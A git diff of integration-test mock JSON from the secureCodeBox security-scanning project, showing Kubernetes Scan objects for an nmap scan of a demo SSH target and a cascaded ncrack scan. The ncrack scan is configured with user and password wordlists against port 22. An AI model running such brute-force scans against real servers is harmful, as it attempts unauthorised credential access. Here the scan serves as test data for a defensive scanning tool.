-} -`; - -exports[`Kubernetes interaction tests scan function should create a scan and return findings on successful completion 3`] = ` -[MockFunction] { - "calls": [ - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - "nmap-example-pw8vt", - ], - [ - "execution.securecodebox.io", - "v1", - "integration-tests", - "scans", - "nmap-example-pw8vt", - ], - ], - "results": [ - { - "type": "return", - "value": Promise {}, - }, - { - "type": "return", - "value": Promise {}, - }, - ], -} -`; diff --git a/tests/integration/__snapshots__/helpers.test.js.snap.license b/tests/integration/__snapshots__/helpers.test.js.snap.license deleted file mode 100644 index c95bc37185..0000000000 --- a/tests/integration/__snapshots__/helpers.test.js.snap.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json b/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json index 57db132c7d..c08b9ab5ba 100644 --- a/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json +++ b/tests/integration/__testFiles__/mockCascadingListNamespacedCustomObject.json @@ -1,399 +1,397 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "items": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "6c32098e-36e0-491a-b40b-1741081bf7c7", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-7jz42", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "items": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "6c32098e-36e0-491a-b40b-1741081bf7c7", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-7jz42", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-02-02T16:45:30Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "ncrack-dummy-ssh-7jz42-ncrack-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} + } + }, + "f:spec": { + "f:resources": {} + } + }, + "manager": "manager", + "operation": "Update", + "time": "2024-02-02T16:45:30Z" }, - "creationTimestamp": "2024-02-02T16:45:30Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "ncrack-dummy-ssh-7jz42-ncrack-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:annotations": { + ".": {}, + "f:cascading.securecodebox.io/chain": {}, + "f:cascading.securecodebox.io/matched-finding": {}, + "f:cascading.securecodebox.io/parent-scan": {}, + "f:securecodebox.io/hook": {} }, - "f:spec": { - "f:resources": {} + "f:generateName": {}, + "f:ownerReferences": { + ".": {}, + "k:{\"uid\":\"c887fffa-ddc9-4a7a-9415-7c46cfaa3649\"}": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-02-02T16:45:30Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:annotations": { + "f:spec": { + ".": {}, + "f:cascades": { + ".": {}, + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:cascading.securecodebox.io/chain": {}, - "f:cascading.securecodebox.io/matched-finding": {}, - "f:cascading.securecodebox.io/parent-scan": {}, - "f:securecodebox.io/hook": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} }, - "f:generateName": {}, - "f:ownerReferences": { + "f:scopeLimiter": { ".": {}, - "k:{\"uid\":\"c887fffa-ddc9-4a7a-9415-7c46cfaa3649\"}": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - ".": {}, - "f:cascades": { - ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - }, - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } - }, - "f:hookSelector": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-02-02T16:45:30Z" + "f:hookSelector": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "time": "2024-02-02T16:45:30Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } + }, + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:38Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { ".": {}, - "f:severities": {} + "f:Discovered Credentials": {} }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:38Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Discovered Credentials": {} - }, - "f:count": {}, - "f:severities": { - "f:high": {}, - "f:informational": {}, - "f:low": {}, - "f:medium": {} - } + "f:count": {}, + "f:severities": { + "f:high": {}, + "f:informational": {}, + "f:low": {}, + "f:medium": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:44Z" - } - ], - "name": "ncrack-dummy-ssh-7jz42-ncrack-ssh-h9fdz", - "namespace": "integration-tests", - "ownerReferences": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "blockOwnerDeletion": true, - "controller": true, - "kind": "Scan", - "name": "nmap-dummy-ssh-7jz42", - "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" - } - ], - "resourceVersion": "10500", - "uid": "f0816a28-9b61-4e3e-a586-dd8539390264" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:44Z" + } + ], + "name": "ncrack-dummy-ssh-7jz42-ncrack-ssh-h9fdz", + "namespace": "integration-tests", + "ownerReferences": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "blockOwnerDeletion": true, + "controller": true, + "kind": "Scan", + "name": "nmap-dummy-ssh-7jz42", + "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" + } + ], + "resourceVersion": "10500", + "uid": "f0816a28-9b61-4e3e-a586-dd8539390264" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "hookSelector": {}, - "parameters": [ - "-v", - "-d10", - "-U", - "/ncrack/users.txt", - "-P", - "/ncrack/passwords.txt", - "-p", - "ssh:22", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "ncrack" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=dcde57274c3827a3c0836917f1b2b1ae7e4e50d652284f43fb9ec9bc49a7dea5", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=635b4b9eed12861b93ee0347845d79e8d1857659a53a9da025f838c9fb000345", - "findings": { - "categories": { - "Discovered Credentials": 1 - }, - "count": 1, - "severities": { - "high": 1, - "informational": 0, - "low": 0, - "medium": 0 - } - }, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=7bff833cd4fbda4e827159842ea4b6fa6f5a16fb0fd767fd669ee210a072e758", - "rawResultFile": "ncrack-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=da487d933df9c7c6c3b0edcbfe546f521a31bd9f1bd772a61a8bcdeb78b61677", - "rawResultType": "ncrack-xml", - "state": "Parsing" - } + "hookSelector": {}, + "parameters": [ + "-v", + "-d10", + "-U", + "/ncrack/users.txt", + "-P", + "/ncrack/passwords.txt", + "-p", + "ssh:22", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "ncrack" }, - { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-02-02T16:44:55Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-dummy-ssh-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=dcde57274c3827a3c0836917f1b2b1ae7e4e50d652284f43fb9ec9bc49a7dea5", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=635b4b9eed12861b93ee0347845d79e8d1857659a53a9da025f838c9fb000345", + "findings": { + "categories": { + "Discovered Credentials": 1 + }, + "count": 1, + "severities": { + "high": 1, + "informational": 0, + "low": 0, + "medium": 0 + } + }, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=7bff833cd4fbda4e827159842ea4b6fa6f5a16fb0fd767fd669ee210a072e758", + "rawResultFile": "ncrack-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-f0816a28-9b61-4e3e-a586-dd8539390264/ncrack-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164530Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=da487d933df9c7c6c3b0edcbfe546f521a31bd9f1bd772a61a8bcdeb78b61677", + "rawResultType": "ncrack-xml", + "state": "Parsing" + } + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-02-02T16:44:55Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-dummy-ssh-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} + }, + "f:spec": { + ".": {}, + "f:cascades": { ".": {}, - "f:cascades": { + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - } - }, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} + } + }, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-02-02T16:44:55Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "unknown", - "operation": "Update", - "time": "2024-02-02T16:44:55Z" - }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { + "f:spec": { + "f:cascades": { + "f:scopeLimiter": { ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} + "f:validOnMissingRender": {} } }, - "f:spec": { - "f:cascades": { - "f:scopeLimiter": { - ".": {}, - "f:validOnMissingRender": {} - } - }, - "f:resources": {} - } - }, - "manager": "manager", - "operation": "Update", - "time": "2024-02-02T16:44:56Z" + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { - "f:findings": { - "f:categories": { - ".": {}, - "f:Host": {}, - "f:Open Port": {} - }, - "f:count": {}, - "f:severities": { - "f:informational": {} - } + "manager": "manager", + "operation": "Update", + "time": "2024-02-02T16:44:56Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + "f:findings": { + "f:categories": { + ".": {}, + "f:Host": {}, + "f:Open Port": {} + }, + "f:count": {}, + "f:severities": { + "f:informational": {} } } - }, - "manager": "unknown", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:16Z" + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "unknown", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:16Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:orderedHookStatuses": {}, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-02-02T16:45:33Z" - } - ], - "name": "nmap-dummy-ssh-7jz42", - "namespace": "integration-tests", - "resourceVersion": "10454", - "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" - }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" + "f:severities": {} + }, + "f:orderedHookStatuses": {}, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "scopeLimiter": { - "validOnMissingRender": false - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-02-02T16:45:33Z" + } + ], + "name": "nmap-dummy-ssh-7jz42", + "namespace": "integration-tests", + "resourceVersion": "10454", + "uid": "c887fffa-ddc9-4a7a-9415-7c46cfaa3649" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" }, - "parameters": [ - "-Pn", - "-sV", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" + "scopeLimiter": { + "validOnMissingRender": false + } }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=a17a3830b745b2f715641ed4e4ee5c561106a79eed6798d294fe693792e4315a", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=28127d19e36438aa686249a3e53e8ffb2ac38c02f9a5679127e0fc466b4fedfc", - "findings": { - "categories": { - "Host": 1, - "Open Port": 1 - }, - "count": 2, - "severities": { - "informational": 2 - } + "parameters": [ + "-Pn", + "-sV", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=a17a3830b745b2f715641ed4e4ee5c561106a79eed6798d294fe693792e4315a", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=28127d19e36438aa686249a3e53e8ffb2ac38c02f9a5679127e0fc466b4fedfc", + "findings": { + "categories": { + "Host": 1, + "Open Port": 1 }, - "orderedHookStatuses": [ - [ - { - "hookName": "dssh-cascading-scans", - "jobName": "dssh-cascading-scans-nmap-dummy-ssh-7jz42-8gq5m", - "priority": 0, - "state": "Completed", - "type": "ReadOnly" - } - ] - ], - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=13930cec08c3e576709d6620dcd16a0d51c230003c5346c653de643e0096e9a6", - "rawResultFile": "nmap-results.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=9cc5a0324f40c250f8402587036e18386f6fbf47a81b431bed8c7af9cddc4c76", - "rawResultType": "nmap-xml", - "state": "Done" - } + "count": 2, + "severities": { + "informational": 2 + } + }, + "orderedHookStatuses": [ + [ + { + "hookName": "dssh-cascading-scans", + "jobName": "dssh-cascading-scans-nmap-dummy-ssh-7jz42-8gq5m", + "priority": 0, + "state": "Completed", + "type": "ReadOnly" + } + ] + ], + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=13930cec08c3e576709d6620dcd16a0d51c230003c5346c653de643e0096e9a6", + "rawResultFile": "nmap-results.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c887fffa-ddc9-4a7a-9415-7c46cfaa3649/nmap-results.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240202%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240202T164456Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=9cc5a0324f40c250f8402587036e18386f6fbf47a81b431bed8c7af9cddc4c76", + "rawResultType": "nmap-xml", + "state": "Done" } - ], - "kind": "ScanList", - "metadata": { - "continue": "", - "resourceVersion": "10507" } + ], + "kind": "ScanList", + "metadata": { + "continue": "", + "resourceVersion": "10507" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json b/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json index 5d4f59d527..48237acc0f 100644 --- a/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json +++ b/tests/integration/__testFiles__/mockCascadingScanCreationResponse.json @@ -1,74 +1,72 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-30T13:24:55Z", - "generateName": "nmap-dummy-ssh-", - "generation": 1, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:generateName": {} - }, - "f:spec": { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-30T13:24:55Z", + "generateName": "nmap-dummy-ssh-", + "generation": 1, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} + }, + "f:spec": { + ".": {}, + "f:cascades": { ".": {}, - "f:cascades": { + "f:inheritAffinity": {}, + "f:inheritAnnotations": {}, + "f:inheritEnv": {}, + "f:inheritHookSelector": {}, + "f:inheritInitContainers": {}, + "f:inheritLabels": {}, + "f:inheritTolerations": {}, + "f:inheritVolumes": {}, + "f:matchLabels": { ".": {}, - "f:inheritAffinity": {}, - "f:inheritAnnotations": {}, - "f:inheritEnv": {}, - "f:inheritHookSelector": {}, - "f:inheritInitContainers": {}, - "f:inheritLabels": {}, - "f:inheritTolerations": {}, - "f:inheritVolumes": {}, - "f:matchLabels": { - ".": {}, - "f:securecodebox.io/intensive": {}, - "f:securecodebox.io/invasive": {} - } - }, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {} - } - }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-30T13:24:55Z" - } - ], - "name": "nmap-dummy-ssh-d47zk", - "namespace": "integration-tests", - "resourceVersion": "20493", - "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + "f:securecodebox.io/intensive": {}, + "f:securecodebox.io/invasive": {} + } + }, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-30T13:24:55Z" + } + ], + "name": "nmap-dummy-ssh-d47zk", + "namespace": "integration-tests", + "resourceVersion": "20493", + "uid": "09f2fd3f-2fb3-4ae4-8347-9cbe23af97b3" + }, + "spec": { + "cascades": { + "inheritAffinity": true, + "inheritAnnotations": true, + "inheritEnv": false, + "inheritHookSelector": false, + "inheritInitContainers": false, + "inheritLabels": true, + "inheritTolerations": true, + "inheritVolumes": false, + "matchLabels": { + "securecodebox.io/intensive": "high", + "securecodebox.io/invasive": "invasive" + } }, - "spec": { - "cascades": { - "inheritAffinity": true, - "inheritAnnotations": true, - "inheritEnv": false, - "inheritHookSelector": false, - "inheritInitContainers": false, - "inheritLabels": true, - "inheritTolerations": true, - "inheritVolumes": false, - "matchLabels": { - "securecodebox.io/intensive": "high", - "securecodebox.io/invasive": "invasive" - } - }, - "parameters": [ - "-Pn", - "-sV", - "dummy-ssh.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "scanType": "nmap" - } + "parameters": [ + "-Pn", + "-sV", + "dummy-ssh.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "scanType": "nmap" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json b/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json index 1e269c96bb..0a2a8cf189 100644 --- a/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json +++ b/tests/integration/__testFiles__/mockCascadingScanStatusResponse.json @@ -1,214 +1,212 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "annotations": { - "cascading.securecodebox.io/chain": "ncrack-ssh", - "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", - "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", - "securecodebox.io/hook": "cascading-scans" + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "annotations": { + "cascading.securecodebox.io/chain": "ncrack-ssh", + "cascading.securecodebox.io/matched-finding": "ca358271-980b-4f9a-a1b1-92b64f1d2a44", + "cascading.securecodebox.io/parent-scan": "nmap-dummy-ssh-d47zk", + "securecodebox.io/hook": "cascading-scans" + }, + "creationTimestamp": "2024-01-30T13:25:25Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": 